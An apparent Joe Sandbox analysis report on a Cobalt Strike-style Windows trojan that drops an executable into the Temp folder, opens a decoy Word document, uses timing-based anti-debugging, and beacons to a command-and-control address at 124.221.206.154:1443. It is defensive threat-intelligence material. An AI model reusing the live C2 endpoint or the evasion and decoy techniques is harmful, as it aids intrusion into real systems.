Source: 1a#U77e5.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x33da00
Source: 1a#U77e5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A920EC push 0000006Ah; retf 3_2_0000025BF8A92104
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ABA71E push cs; retf 3_2_0000025BF8ABA71F
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AD60DB push ebp; iretd 3_2_0000025BF8AD60DC
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AD6124 push ebp; iretd 3_2_0000025BF8AD6125
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AD60FB push ebp; iretd 3_2_0000025BF8AD60FC
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ABA35D push edi; iretd 3_2_0000025BF8ABA35E
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ABBD58 push ebp; iretd 3_2_0000025BF8ABBD59
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ADAE68 push ebp; iretd 3_2_0000025BF8ADAE6D
Source: 1a#U77e5.exeStatic PE information: section name: /4
Source: 1a#U77e5.exeStatic PE information: section name: /19
Source: 1a#U77e5.exeStatic PE information: section name: /32
Source: 1a#U77e5.exeStatic PE information: section name: /46
Source: 1a#U77e5.exeStatic PE information: section name: /65
Source: 1a#U77e5.exeStatic PE information: section name: /78
Source: 1a#U77e5.exeStatic PE information: section name: /90
Source: 1a#U77e5.exeStatic PE information: section name: .symtab
Source: ????????????.exe.0.drStatic PE information: section name: /4
Source: ????????????.exe.0.drStatic PE information: section name: /19
Source: ????????????.exe.0.drStatic PE information: section name: /32
Source: ????????????.exe.0.drStatic PE information: section name: /46
Source: ????????????.exe.0.drStatic PE information: section name: /65
Source: ????????????.exe.0.drStatic PE information: section name: /78
Source: ????????????.exe.0.drStatic PE information: section name: /90
Source: ????????????.exe.0.drStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\1a#U77e5.exeFile created: C:\Windows\Temp\????????????.exe
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\Temp\????????????.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\Temp\????????????.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Source: C:\Windows\Temp\????????????.exe TID: 2264 Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\Temp\????????????.exe Last function: Thread delayed
Source: C:\Windows\Temp\????????????.exe Code function: 3_2_013582C0 rdtscp
Source: C:\Windows\Temp\????????????.exe Thread delayed: delay time: 60000
Source: 1a#U77e5.exe, 00000000.00000002.441267582.0000027D4128C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM]
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging

Source: C:\Windows\Temp\????????????.exe Code function: 3_2_013582C0 Start: 013582C9 End: 013582DF
Source: C:\Windows\Temp\????????????.exe Code function: 3_2_013582C0 rdtscp
Source: C:\Users\user\Desktop\1a#U77e5.exe Process created: C:\Windows\Temp\????????????.exe C:\Windows\Temp\????????????.exe 9gb3vbgeng
Source: C:\Users\user\Desktop\1a#U77e5.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c start ?????????????????????.docx
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o "
Source: C:\Windows\Temp\????????????.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Temp\????????????.exe Code function: 3_2_0000025BF8AC3B5C GetUserNameA,strrchr,_snprintf,

Remote Access Functionality

Source: Yara match File source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTR
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Virtualization/Sandbox Evasion | LSASS Memory | 11 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 System Owner/User Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Software Packing | Cached Domain Credentials | 3 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Behavior Graph ID: 679126 Sample: 1a#U77e5.exe Startdate: 05/08/2022 Architecture: WINDOWS Score: 100
Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 3 other signatures

  • 1a#U77e5.exe: started
    • C:\Windows\Temp\????????????.exe, PE32+: dropped
    • ????????????.exe: started
      • DNS/IP: 124.221.206.154, 1443, 49755, 49763 JCN-AS-KRUlsanJung-AngBroadcastingNetworkKR China
      • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Potentially malicious time measurement code found
      • conhost.exe: started
    • cmd.exe: started
      • WINWORD.EXE: started
      • conhost.exe: started

Source | Detection | Scanner | Label
1a#U77e5.exe | 61% | Virustotal |
1a#U77e5.exe | 23% | Metadefender |
1a#U77e5.exe | 77% | ReversingLabs | Win64.Trojan.CobaltStrike
1a#U77e5.exe | 100% | Avira | TR/CobaltStrike.fyzok

Source | Detection | Scanner | Label
C:\Windows\Temp\????????????.exe | 100% | Avira | HEUR/AGEN.1211767
C:\Windows\Temp\????????????.exe | 26% | Metadefender |
C:\Windows\Temp\????????????.exe | 62% | ReversingLabs | Win64.Downloader.Gobalt

Source | Detection | Scanner | Label
3.2.????????????.exe.1300000.0.unpack | 100% | Avira | HEUR/AGEN.1211767
0.0.1a#U77e5.exe.2a0000.0.unpack | 100% | Avira | HEUR/AGEN.1211854
0.2.1a#U77e5.exe.2a0000.0.unpack | 100% | Avira | HEUR/AGEN.1211854
3.0.????????????.exe.1300000.0.unpack | 100% | Avira | HEUR/AGEN.1211767

No Antivirus matches

Source | Detection | Scanner | Label
https://roaming.edog. | 0% | URL Reputation | safe
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
https://124.221.206.154:1443/ubmit.phpn | 100% | Avira URL Cloud | malware
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
https://124.221.206.154:1443/ubmit.php | 100% | Avira URL Cloud | malware
https://124.221.206.154/n-US | 100% | Avira URL Cloud | malware
https://my.microsoftpersonalcontent.com | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://124.221.206.154:1443/ | 100% | Avira URL Cloud | malware
https://api.aadrm.com | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://124.221.206.154/W | 100% | Avira URL Cloud | malware
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://124.221.206.154:1443/submit.phpo | 100% | Avira URL Cloud | malware
https://ncus.contentsync. | 0% | URL Reputation | safe
https://124.221.206.154:1443/submit.phpw | 100% | Avira URL Cloud | malware
https://124.221.206.154:1443/submit.phpy | 100% | Avira URL Cloud | malware
https://124.221.206.154/- | 100% | Avira URL Cloud | malware
https://124.221.206.154:1443/submit.phpx | 100% | Avira URL Cloud | malware
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
124.221.206.154 | 100% | Avira URL Cloud | malware
https://124.221.206.154:1443/0; | 100% | Avira URL Cloud | malware
https://124.221.206.154:1443/submit.phpI | 100% | Avira URL Cloud | malware
https://wus2.contentsync. | 0% | URL Reputation | safe
https://124.221.206.154:1443/submit.phpQ | 100% | Avira URL Cloud | malware
https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
https://124.221.206.154:1443/submit.phpc | 100% | Avira URL Cloud | malware
https://124.221.206.154:1443/submit.phpe | 100% | Avira URL Cloud | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
124.221.206.154 | true | Avira URL Cloud: malware | unknown
????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://124.221.206.154:1443/submit.phpx????????????.exe, 00000003.00000002.707682885.0000025BF36AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspxE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                      high
                                                                                      https://124.221.206.154:1443/0;????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://messaging.lifecycle.office.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                          high
                                                                                          https://124.221.206.154:1443/submit.phpI????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://management.azure.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                            high
                                                                                            https://outlook.office365.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                              high
                                                                                              https://wus2.contentsync.E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://incidents.diagnostics.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                high
                                                                                                https://clients.config.office.net/user/v1.0/iosE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                  high
                                                                                                  https://124.221.206.154:1443/submit.phpQ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://insertmedia.bing.office.net/odc/insertmediaE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                    high
                                                                                                    https://o365auditrealtimeingestion.manage.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                        high
                                                                                                        https://api.office.netE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                          high
                                                                                                          https://incidents.diagnosticssdf.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                            high
                                                                                                            https://asgsmsproxyapi.azurewebsites.net/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://clients.config.office.net/user/v1.0/android/policiesE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                              high
                                                                                                              https://entitlement.diagnostics.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                high
                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                  high
                                                                                                                  https://substrate.office.com/search/api/v2/initE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                    high
                                                                                                                    https://124.221.206.154:1443/submit.phpc????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 
00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://outlook.office.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                      high
                                                                                                                      https://124.221.206.154:1443/submit.phpe????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 
00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://storage.live.com/clientlogs/uploadlocationE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office365.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                          high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
124.221.206.154 | unknown | China | | 45361 | JCN-AS-KRUlsanJung-AngBroadcastingNetworkKR | true
                                                                                                                          Joe Sandbox Version:35.0.0 Citrine
                                                                                                                          Analysis ID:679126
Start date and time: 2022-08-05 09:54:36 +02:00
                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                          Overall analysis duration:0h 8m 33s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Sample file name:1a#U77e5.exe
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                          Number of analysed new started processes analysed:23
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • HDC enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.evad.winEXE@10/8@0/1
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 50%
                                                                                                                          HDC Information:
                                                                                                                          • Successful, ratio: 45.8% (good quality ratio 43%)
                                                                                                                          • Quality average: 68.2%
                                                                                                                          • Quality standard deviation: 27.6%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 81%
                                                                                                                          • Number of executed functions: 8
                                                                                                                          • Number of non-executed functions: 132
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Adjust boot time
                                                                                                                          • Enable AMSI
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.88.191, 52.109.76.33, 52.109.12.21, 20.238.103.94, 20.223.24.244
                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                          • Execution Graph export aborted for target 1a#U77e5.exe, PID 5296 because there are no executed function
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
Time | Type | Description
09:55:50 | API Interceptor | 30x Sleep call for process: ????????????.exe modified
                                                                                                                          • 124.221.134.175
                                                                                                                          miori.x86-20220630-2250Get hashmaliciousBrowse
                                                                                                                          • 182.161.250.2
                                                                                                                          mips-20220630-1413Get hashmaliciousBrowse
                                                                                                                          • 124.220.114.100
                                                                                                                          Quote.jsGet hashmaliciousBrowse
                                                                                                                          • 124.221.134.175
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):148061
                                                                                                                          Entropy (8bit):5.35816450806037
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:ncQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:W1Q9DQe+zuXYr
                                                                                                                          MD5:DD89B24BAA865B152396CB932251EA2F
                                                                                                                          SHA1:D0DB98C4FE2E281C64DF4F44DF5279F34E56DB54
                                                                                                                          SHA-256:E25E7342FAD7C59D3D7E5F224BC370F1541CE3AD01FAF4C922F84F71137AF827
                                                                                                                          SHA-512:E6599769C65FE10E4E70997B37F2A343BB6169C3FD09DB837A51386BE4E5DA019AF389D1AF09DABF60A80FD45F2347F6244930AA4AEBBE31066772D048039880
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
